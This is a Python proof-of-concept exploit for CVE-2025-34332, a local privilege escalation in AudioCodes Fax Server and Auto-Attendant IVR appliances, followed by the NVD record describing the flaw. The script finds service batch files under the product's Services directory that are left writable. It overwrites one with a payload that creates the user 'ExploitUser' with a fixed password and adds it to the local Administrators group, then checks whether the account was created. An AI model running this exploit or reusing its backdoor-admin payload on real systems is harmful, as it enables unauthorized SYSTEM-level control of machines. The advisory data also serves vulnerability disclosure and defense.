CVE-2025-34332

# CVE-2025-34332 AudioCodes Fax Server LPE PoC # This PoC demonstrates local privilege escalation via writable service scripts import os import subprocess import time TARGET_DIR = r'C:\F2MAdmin\F2E\AudioCodes_files\utils\Services' BACKUP_EXT = '.bak' def check_script_permissions(): """Check if service scripts are writable by current user""" if not os.path.exists(TARGET_DIR): print(f"[-] Target directory not found: {TARGET_DIR}") return False scripts = [f for f in os.listdir(TARGET_DIR) if f.endswith('.bat')] writable_scripts = [] for script in scripts: script_path = os.path.join(TARGET_DIR, script) # Check write permission if os.access(script_path, os.W_OK): writable_scripts.append(script) print(f"[+] Writable script found: {script}") return writable_scripts def backup_script(script_path): """Backup original script content""" backup_path = script_path + BACKUP_EXT try: with open(script_path, 'r') as f: original_content = f.read() with open(backup_path, 'w') as f: f.write(original_content) print(f"[+] Backup created: {backup_path}") return original_content except Exception as e: print(f"[-] Backup failed: {e}") return None def inject_payload(script_path, payload): """Inject malicious payload into script""" try: with open(script_path, 'w') as f: f.write(payload) print(f"[+] Payload injected into: {script_path}") return True except Exception as e: print(f"[-] Injection failed: {e}") return False def trigger_service_action(): """Trigger service action via ajaxPost.php to execute modified script""" # This would typically be an HTTP request to the web interface # Example: POST request to ajaxPost.php with service action parameters print("[*] Triggering service action via web interface...") print("[*] Waiting for scheduled service operation...") time.sleep(5) return True def main(): print("=" * 60) print("CVE-2025-34332 AudioCodes Fax Server LPE Exploit") print("=" * 60) # Step 1: Check for writable scripts print("\n[Step 1] Checking script permissions...") writable_scripts = check_script_permissions() if not writable_scripts: print("[-] No writable scripts found or not vulnerable") return # Step 2: Select target script and backup target_script = writable_scripts[0] script_path = os.path.join(TARGET_DIR, target_script) print(f"\n[Step 2] Backing up original script...") original_content = backup_script(script_path) if not original_content: return # Step 3: Inject malicious payload print("\n[Step 3] Injecting privilege escalation payload...") # Payload: Create a new admin user payload = f'''@echo off REM Malicious payload for CVE-2025-34332 net user ExploitUser P@ssw0rd123 /add net localgroup Administrators ExploitUser /add REM Restore original script content {original_content} ''' inject_payload(script_path, payload) # Step 4: Trigger service action print("\n[Step 4] Triggering service action...") trigger_service_action() # Step 5: Verify exploitation print("\n[Step 5] Verifying privilege escalation...") result = subprocess.run('net user ExploitUser', capture_output=True, text=True) if 'ExploitUser' in result.stdout: print("[+] SUCCESS: New admin user created!") print("[+] Username: ExploitUser") print("[+] Password: P@ssw0rd123") else: print("[-] Exploitation may have failed or requires manual trigger") print("\n[!] Remember to restore original script after testing") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-34332", "sourceIdentifier": "[email protected]", "published": "2025-11-19T17:15:48.133", "lastModified": "2025-12-11T21:19:07.110", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 include a web administration component that controls back-end Windows services using helper batch scripts located under C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\utils\\\\Services. When certain service actions are requested through ajaxPost.php, these scripts are invoked by PHP using system() under the NT AUTHORITY\\\\SYSTEM account. The batch files in this directory are writable by any authenticated local user due to overly permissive ACLs, allowing them to replace script contents with arbitrary commands. On the next service start/stop operation, the modified script is executed as SYSTEM, enabling elevation of local privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:audiocodes:fax_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.6.23", "matchCriteriaId": "A325B684-937A-4AE9-A8B2-235ADB2D1932"}, {"vulnerable": true, "criteria": "cpe:2.3:a:audiocodes:interactive_voice_response:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.6.23", "matchCriteriaId": "131420AA-FE49-42FC-A8EC-50C5EB40D3A3"}]}]}], "references": [{"url": "https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-insecure-service-control-scripts-lpe", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}